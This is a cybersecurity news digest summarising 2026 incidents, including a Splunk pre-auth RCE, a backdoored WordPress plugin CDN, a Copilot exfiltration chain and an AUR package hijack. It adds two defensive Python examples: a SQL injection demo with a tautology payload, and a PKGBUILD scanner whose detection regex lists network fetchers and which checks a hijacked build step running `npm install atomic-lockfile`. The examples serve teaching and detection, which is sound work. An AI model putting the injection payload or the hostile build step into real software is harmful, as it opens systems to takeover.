Splunk pre-auth RCE, OptinMonster 1.2M sites backdoored
Splunk Enterprise versions 10+ on AWS ship with an enabled PostgreSQL Sidecar Service that lets unauthenticated attackers execute code remotely (CVE‑2026‑20253, CVSS 9.8). Attackers bypass the web proxy and reach the sidecar endpoint directly, so default cloud deployments are exploitable out of the box. Patch, or disable the sidecar, to stop the pre‑auth RCE.
Sansec uncovered a supply‑chain attack that hijacked the CDN serving Awesome Motive's OptinMonster, TrustPulse and PushEngage plugins, injecting malicious JavaScript that creates hidden admin accounts on 1.2 million WordPress sites. The backdoor fires only in a logged‑in administrator's browser session, so the account is created with that admin's privileges, giving attackers full control of the site and showing how one vendor's CDN can expose an entire plugin family at once.
Varonis Threat Labs discovered SearchLeak, a three‑stage chain in M365 Copilot Enterprise Search that turns a malicious link into a silent data exfiltration tool, stealing emails, files, and calendar items with a single click. Microsoft assigned it CVE‑2026‑42824, rated critical, and has released a patch.
Check Point Research uncovered three chained flaws in LangGraph's SQLite checkpointer, starting with CVE‑2025‑67644, an SQL injection through a metadata filter. Attacker‑controlled filter values reach the SQL text unescaped; the resulting injection is chained into arbitrary deserialization and then full remote code execution, jeopardizing any system that relies on LangGraph's persistence layer.
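The first link in that chain, a metadata filter spliced into SQL, is easy to reproduce and easy to fix. The Python below is an added example written for this digest, not LangGraph's checkpointer code or Check Point's exploit: the table layout, the `search_vulnerable`/`search_safe` functions and the three sample checkpoint rows are all constructed stand‑ins. It shows the injectable pattern beside a hardened version that whitelists key names and binds the JSON path and value as parameters, so the injection payload returns nothing instead of every thread.

```python
import json
import re
import sqlite3

# Constructed checkpoint rows; the schema is a simplified stand-in, not LangGraph's.
SAMPLE_ROWS = [
    ("thread-1", {"source": "input", "step": 1, "user": "alice"}),
    ("thread-2", {"source": "loop", "step": 2, "user": "bob"}),
    ("thread-3", {"source": "input", "step": 3, "user": "carol"}),
]


def make_db():
    """In-memory SQLite store: one JSON metadata blob per checkpoint."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE checkpoints (thread_id TEXT, metadata TEXT)")
    conn.executemany(
        "INSERT INTO checkpoints VALUES (?, ?)",
        [(tid, json.dumps(md)) for tid, md in SAMPLE_ROWS],
    )
    return conn


def search_vulnerable(conn, metadata_filter):
    """Anti-pattern: keys and values from the caller are formatted straight
    into the SQL text, so a value such as  x' OR '1'='1  rewrites the query."""
    clauses = [
        f"json_extract(metadata, '$.{k}') = '{v}'" for k, v in metadata_filter.items()
    ]
    where = " AND ".join(clauses) or "1 = 1"
    sql = f"SELECT thread_id FROM checkpoints WHERE {where} ORDER BY thread_id"
    return [row[0] for row in conn.execute(sql)]


_KEY = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def search_safe(conn, metadata_filter):
    """Hardened form: key names must match a strict identifier pattern, and
    both the JSON path and the value are bound as parameters, never as SQL."""
    clauses, params = [], []
    for k, v in metadata_filter.items():
        if not _KEY.match(k):
            raise ValueError(f"illegal metadata key: {k!r}")
        clauses.append("json_extract(metadata, ?) = ?")
        params.extend([f"$.{k}", v])
    where = " AND ".join(clauses) or "1 = 1"
    sql = f"SELECT thread_id FROM checkpoints WHERE {where} ORDER BY thread_id"
    return [row[0] for row in conn.execute(sql, params)]


def safe_rejects_key(conn, key):
    """True if the hardened search refuses a key that is not a plain identifier."""
    try:
        search_safe(conn, {key: "x"})
    except ValueError:
        return True
    return False


# Classic tautology payload carried in a filter *value*.
INJECTION = {"source": "x' OR '1'='1"}

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, honest filter:", search_vulnerable(db, {"source": "input"}))
    print("vulnerable, injected     :", search_vulnerable(db, INJECTION))
    print("safe, injected           :", search_safe(db, INJECTION))
    print("safe rejects bad key     :", safe_rejects_key(db, "source') OR 1=1 --"))
```

The comparison in `search_safe` keeps SQLite's type semantics: `json_extract` returns an integer for `"step": 2`, and a bound Python `int` matches it, so the hardened path still supports non‑string metadata without any string formatting. Blocking the injection does not by itself remove the later deserialization link in the chain; it only denies the attacker the SQL foothold the chain starts from.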
A disgruntled zero‑day researcher, calling themselves Nightmare, has released six unpatched Windows exploits, three already weaponised, and vowed a "bone‑shattering" dump on July 14. Microsoft responded by involving law enforcement, accusing the researcher of breach of coordination, sparking a rare public feud that could chill future vulnerability disclosures.
Two Chrome extensions posing as ad blockers have been siphoning full chat histories from ChatGPT, Claude, Gemini and five other AI services from roughly 90,000 users. The malicious code captures prompts, responses, model details and subscription status, then exfiltrates the data to operator-controlled servers, revealing a sophisticated data‑theft operation.
The FBI, Google and Black Lotus Labs took down Outsider Enterprise, a China‑based AI‑driven phishing‑as‑a‑service that operated over 9,000 fake sites and more than a million URLs, stealing 3.8 million credit cards and causing $1.9 billion in losses. The takedown seized servers, a Shopify store, $100k USDT and a Telegram bot, and Google filed a civil suit to block future scams.
Researchers found the Atomic Arch campaign hijacking abandoned Arch User Repository packages. By swapping in PKGBUILDs that pull the malicious npm module atomic-lockfile during the build, attackers install a Linux payload with eBPF-based rootkit capabilities, potentially affecting up to 1,500 downstream packages. The campaign shows how trust in an abandoned package name can be subverted without writing new code.
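A check a practitioner would want after an item like this: flag PKGBUILDs whose build-phase functions fetch code from the network. makepkg verifies checksums only for entries in the `source=()` array, so an `npm install` inside `prepare()` pulls whatever the registry serves that day, with nothing pinning it. The Python below is an added example written for this digest, not code from the Atomic Arch research or from the Arch project; both PKGBUILDs are constructed, and only the `atomic-lockfile` module name comes from the summary above.

```python
import re

# Constructed PKGBUILD fragments for illustration; neither is a real AUR package.
CLEAN_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.0
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""

# Same package after a hostile takeover: the only visible change is a new
# prepare() step that fetches an npm module outside the checksummed sources.
HIJACKED_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.1
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

prepare() {
  cd "$pkgname-$pkgver"
  npm install atomic-lockfile
}

build() {
  cd "$pkgname-$pkgver"
  make
}
"""

FUNC_START = re.compile(r"^(\w+)\s*\(\)\s*\{")
# Commands that reach the network at build time and bypass source=() checksums.
FETCHER = re.compile(
    r"(?<![\w/])(npm\s+(?:install|i|ci|add)\b|npx\b|yarn\s+(?:add|install)\b"
    r"|pnpm\s+(?:add|install)\b|pip3?\s+install\b|curl\b|wget\b|git\s+clone\b)"
)


def parse_functions(pkgbuild):
    """Return {name: [body lines]} for the top-level shell functions in a PKGBUILD."""
    funcs, current = {}, None
    for line in pkgbuild.splitlines():
        m = FUNC_START.match(line)
        if m:
            current = m.group(1)
            funcs[current] = []
        elif current is not None and line.strip() == "}":
            current = None
        elif current is not None:
            funcs[current].append(line.strip())
    return funcs


def undeclared_fetches(pkgbuild):
    """List (function, line) pairs where a build-phase function downloads
    code that makepkg never checksums."""
    hits = []
    for name, body in parse_functions(pkgbuild).items():
        for line in body:
            if line.startswith("#"):
                continue  # skip comments
            if FETCHER.search(line):
                hits.append((name, line))
    return hits


if __name__ == "__main__":
    print("clean   :", undeclared_fetches(CLEAN_PKGBUILD))
    print("hijacked:", undeclared_fetches(HIJACKED_PKGBUILD))
```

Run it over a local AUR checkout before `makepkg -si`; a non-empty result means the build depends on a download that no `sha256sums` entry protects, which is exactly the gap a package takeover exploits. The regex is a deliberately narrow allowlist of common fetchers; extend it for the package managers your builds actually use.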
France’s official encrypted messaging service Tchap was compromised on June 7, 2026 after a malicious actor hijacked a user account. The breach exposed personal data for 73,467 public‑sector users and gave the attacker access to public‑room messages, underscoring the risk of relying on single‑sign‑on accounts for secure communications.
Anthropic announced it must abruptly disable its Fable 5 and Mythos 5 models for all users after a U.S. export‑control directive barred foreign nationals from accessing them. The government cited a narrow jailbreak risk, marking the first time export controls target AI models rather than chips, and raising the stakes for AI security tools worldwide.
The FCC proposal would force carriers to collect government ID and address for every prepaid line, effectively ending burner phones. Advocates warn the blanket data sweep mirrors authoritarian practices and could expose users to surveillance, while the agency claims it’s needed to curb scams.
A DPRK-linked actor, dubbed FAMOUS CHOLLIMA, posts fake job ads on Google Docs to lure developers into installing credential‑stealing malware. The blog details how to hunt these Docs via urlscan and a custom index, revealing long‑lived accounts and reused assets across campaigns.